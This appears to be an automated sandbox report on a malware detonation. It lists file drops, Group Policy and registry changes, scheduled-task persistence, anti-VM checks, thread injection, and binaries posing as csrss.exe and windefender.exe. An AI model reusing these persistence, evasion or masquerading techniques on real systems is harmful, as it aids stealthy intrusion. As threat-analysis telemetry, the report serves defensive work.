File opened for modification	C:\Windows\System32\GroupPolicy	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	BEppgGl.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	BEppgGl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	BEppgGl.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	blelkQh.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	BEppgGl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	BEppgGl.exe
File created	C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.sys	MsiExec.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	blelkQh.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	BEppgGl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	BEppgGl.exe
File opened for modification	C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.inf	MsiExec.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	BEppgGl.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	BEppgGl.exe
File opened for modification	C:\Windows\system32\DRVSTORE	MsiExec.exe
File created	C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.inf	MsiExec.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	MsiExec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Ae6KcqZDG3RHyqUIPyDn6abJ.exe

pid process

2972 Ae6KcqZDG3RHyqUIPyDn6abJ.exe

pid	process
2972	Ae6KcqZDG3RHyqUIPyDn6abJ.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exeUniversalInstaller.execmd.exe

description	pid	process	target process
PID 824 set thread context of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 604 set thread context of 2040	604	UniversalInstaller.exe	cmd.exe
PID 2040 set thread context of 2492	2040	cmd.exe	MSBuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

ZHWH2GFKQja0muj4RLymlJe3.exeXFyfSPWtThhhYf9nK71Dwc6z.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	ZHWH2GFKQja0muj4RLymlJe3.exe
File opened (read-only)	\??\VBoxMiniRdrDN	XFyfSPWtThhhYf9nK71Dwc6z.exe

Drops file in Program Files directory 64 IoCs

Processes:

BEppgGl.exemsiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\ByWuwrOBU\VKEdXN.dll	BEppgGl.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_en.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.cat	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxSDL.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_nt6_unattended.xml	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_uk.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_bg.qm	msiexec.exe
File created	C:\Program Files (x86)\RVqmAwyyxwiU2\oVBKaEcdHXjNM.dll	BEppgGl.exe
File created	C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\debian_postinstall.sh	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\DbgPlugInDiggers.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxDD.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_eu.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fr.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_cs.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_es.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxVMM.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\VirtualBox_constants.py	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_hr_HR.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_tr.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_zh_CN.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxBalloonCtrl.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_nl.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\ol_ks.cfg	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_cs.qm	msiexec.exe
File created	C:\Program Files (x86)\ByWuwrOBU\DFdbEWv.xml	BEppgGl.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxManage.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hr_HR.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_postinstall.cmd	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_pt_BR.qm	msiexec.exe
File created	C:\Program Files (x86)\DUGaRsFaSnqjC\zthFmLB.dll	BEppgGl.exe
File created	C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\debian_preseed.cfg	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\__init__.py	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\platforms\qoffscreen.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\x86\VBoxProxyStub-x86.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_da.qm	msiexec.exe
File created	C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\LDXiXiN.xml	BEppgGl.exe
File created	C:\Program Files\Oracle\VirtualBox\vbox-img.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxAuthSimple.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxSharedClipboard.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_ko.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_ru.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapisetup.py	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_id.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ko.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ru.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_ja.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\Qt5WidgetsVBox.dll	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxDTrace.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_bg.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ja.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_fr.qm	msiexec.exe
File created	C:\Program Files (x86)\RVqmAwyyxwiU2\sdgKSdK.xml	BEppgGl.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxBugReport.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_pt_BR.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\nls\qt_th.qm	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxAutostartSvc.exe	msiexec.exe
File created	C:\Program Files\Oracle\VirtualBox\VBoxExtPackHelperApp.exe	msiexec.exe

Drops file in Windows directory 28 IoCs

Processes:

msiexec.exeMsiExec.execsrss.exeschtasks.execmd.exeZHWH2GFKQja0muj4RLymlJe3.exeXFyfSPWtThhhYf9nK71Dwc6z.exemakecab.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\f77ee0a.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF415.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.app.log	MsiExec.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\qbSDwEgyNYPZlGA.job	schtasks.exe
File created	C:\Windows\Installer\f77ee0a.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI68F.tmp	msiexec.exe
File created	C:\Windows\Tasks\GS_Debug.job	cmd.exe
File created	C:\Windows\Installer\f77ee07.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFA3F.tmp	msiexec.exe
File created	C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6A0.tmp	msiexec.exe
File opened for modification	C:\Windows\rss	ZHWH2GFKQja0muj4RLymlJe3.exe
File opened for modification	C:\Windows\Installer\f77ee07.msi	msiexec.exe
File opened for modification	C:\Windows\rss	XFyfSPWtThhhYf9nK71Dwc6z.exe
File created	C:\Windows\rss\csrss.exe	XFyfSPWtThhhYf9nK71Dwc6z.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\Installer\MSIF3F4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox	msiexec.exe
File created	C:\Windows\Installer\f77ee0c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6D1.tmp	msiexec.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240418222124.cab	makecab.exe
File created	C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job	schtasks.exe
File created	C:\Windows\Tasks\QhciBzJOokLnyYZub.job	schtasks.exe
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File opened for modification	C:\Windows\Installer\MSIF58D.tmp	msiexec.exe
File created	C:\Windows\rss\csrss.exe	ZHWH2GFKQja0muj4RLymlJe3.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2596 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2596	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u180.1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u180.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u180.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u180.1.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2624	schtasks.exe
2808	schtasks.exe
1968	schtasks.exe
2916	schtasks.exe
1588	schtasks.exe
1564	schtasks.exe
1136	schtasks.exe
2608	schtasks.exe
3052	schtasks.exe
112	schtasks.exe
2744	schtasks.exe
2544	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

BEppgGl.exeMsiExec.exeXFyfSPWtThhhYf9nK71Dwc6z.exerundll32.exewscript.execsrss.exenetsh.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	BEppgGl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3336CDC6-A9D1-4922-8D70-2DAF5964B1B4}\aa-e3-bc-f6-08-2c	BEppgGl.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-e3-bc-f6-08-2c\WpadDecisionTime = e06adceade91da01	BEppgGl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	BEppgGl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	BEppgGl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	BEppgGl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0039000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	BEppgGl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	BEppgGl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-e3-bc-f6-08-2c\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	BEppgGl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	MsiExec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0039000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	XFyfSPWtThhhYf9nK71Dwc6z.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3336CDC6-A9D1-4922-8D70-2DAF5964B1B4}\WpadDecision = "0"	BEppgGl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	BEppgGl.exe

Modifies registry class 64 IoCs

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\progId_VirtualBox.Shell.ova\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{C365FB7B-4430-499F-92C8-8BED814A567A}\TypeLib	msiexec.exe
